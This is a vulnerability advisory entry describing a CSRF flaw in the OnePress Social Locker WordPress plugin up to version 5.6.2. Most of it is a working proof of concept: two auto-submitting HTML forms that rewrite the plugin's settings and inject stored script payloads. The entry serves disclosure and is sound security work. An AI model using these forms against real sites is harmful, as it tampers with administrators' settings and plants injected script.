WordPress Plugin Vulnerabilities
OnePress Social Locker <= 5.6.2 - Arbitrary Settings Update via CSRF
Description
The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack
Proof of Concept
<form id="test" action="https://example.com/wp-admin/edit.php?post_type=opanda-item&page=settings-bizpanda&opanda_screen=terms" method="POST">
<input type="text" name="terms_enabled_is_active" value="1">
<input type="text" name="opanda_terms_enabled" value="1">
<input type="text" name="privacy_enabled_is_active" value="1">
<input type="text" name="opanda_privacy_enabled" value="1">
<input type="text" name="terms_use_pages_is_active" value="1">
<input type="text" name="terms_of_use_text_is_active" value="1">
<textarea name="opanda_terms_of_use_text"><img src=x onerror=alert(1)></textarea>
<input type="text" name="privacy_policy_text_is_active" value="1">
<textarea name="opanda_privacy_policy_text"><img src=x onerror=alert(1)></textarea>
<input type="text" name="terms_of_use_page_is_active" value="1">
<input type="text" name="opanda_terms_of_use_page" value="80">
<input type="text" name="privacy_policy_page_is_active" value="1">
<input type="text" name="opanda_privacy_policy_page" value="80">
<input type="text" name="save-action" value="Save Changes">
</form>
<script>
document.getElementById("test").submit();
</script>
<form id="test" action="https://example.com/wp-admin/edit.php?post_type=opanda-item&page=settings-bizpanda&opanda_screen=lock" method="POST">
<input type="text" name="debug_is_active" value="1">
<input type="text" name="passcode_is_active" value="1">
<input type="text" name="opanda_passcode" value="1234">
<input type="text" name="permanent_passcode_is_active" value="1">
<input type="text" name="interrelation_is_active" value="1">
<input type="text" name="in_app_browsers_is_active" value="1">
<input type="text" name="opanda_in_app_browsers" value="visible_with_warning">
<input type="text" name="in_app_browsers_warning_is_active" value="1">
<input type="text" name="opanda_in_app_browsers_warning" value="You are viewing this page in the {browser}. The locker may work incorrectly in this browser. Please open this page in a standard browser.">
<input type="text" name="adblock_is_active" value="1">
<input type="text" name="opanda_adblock" value="show_error">
<input type="text" name="adblock_error_is_active" value="1">
<textarea name="opanda_adblock_error"><img src=x onerror=alert(1)></textarea>
<input type="text" name="rss_is_active" value="1">
<input type="text" name="actual_urls_is_active" value="1">
<input type="text" name="session_duration_is_active" value="1">
<input type="text" name="opanda_session_duration" value="900">
<input type="text" name="session_freezing_is_active" value="1">
<input type="text" name="normalize_markup_is_active" value="1">
<input type="text" name="dynamic_theme_is_active" value="1">
<input type="text" name="managed_hook_is_active" value="1">
<input type="text" name="opanda_managed_hook" value="">
<input type="text" name="alt_overlap_mode_is_active" value="1">
<input type="text" name="opanda_alt_overlap_mode" value="transparence">
<input type="text" name="content_visibility_is_active" value="1">
<input type="text" name="opanda_content_visibility" value="auto">
<input type="text" name="tumbler_is_active" value="1">
<input type="text" name="timeout_is_active" value="1">
<input type="text" name="opanda_timeout" value="20000">
<input type="text" name="save-action" value="Save Changes">
</form>
<script>
document.getElementById("test").submit();
</script> Affects Plugins
No known fix - plugin closed
References
Classification
Miscellaneous
Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes
Timeline
Publicly Published
2022-05-18 (about 2 months ago)
Added
2022-05-18 (about 2 months ago)
Last Updated
2022-05-18 (about 2 months ago)